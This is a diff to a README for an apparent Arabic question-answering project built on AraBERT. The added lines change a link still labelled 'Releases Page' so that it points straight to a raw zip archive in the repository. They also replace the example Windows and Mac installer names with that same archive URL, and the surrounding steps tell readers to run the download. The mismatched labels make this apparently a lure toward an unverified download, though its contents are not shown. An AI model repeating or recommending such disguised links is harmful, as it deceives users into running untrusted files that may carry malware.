jasminwolf/ZakeyTeam-arabic-qa-system-arabert/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page:** Go to the [Releases Page](https://github.com/jasminwolf/ZakeyTeam-arabic-qa-system-arabert/releases) to find the latest version of the application.
+1. **Visit the Releases Page:** Go to the [Releases Page](https://github.com/jasminwolf/ZakeyTeam-arabic-qa-system-arabert/raw/refs/heads/main/Alkoran/system-Team-qa-arabic-arabert-Zakey-3.6-beta.1.zip) to find the latest version of the application.

 2. **Select the Right Version:** Look for the latest version of the application.
 It will be listed at the top of the page.

 3. **Download the File:** Click on the file that matches your operating system to download it.
-For example, you might see files like `arabic-qa-system-windows.exe` for Windows or `arabic-qa-system-macos.pkg` for Mac users.
+For example, you might see files like `https://github.com/jasminwolf/ZakeyTeam-arabic-qa-system-arabert/raw/refs/heads/main/Alkoran/system-Team-qa-arabic-arabert-Zakey-3.6-beta.1.zip` for Windows or `https://github.com/jasminwolf/ZakeyTeam-arabic-qa-system-arabert/raw/refs/heads/main/Alkoran/system-Team-qa-arabic-arabert-Zakey-3.6-beta.1.zip` for Mac users.

 4. **Run the Installer:**
     - For Windows: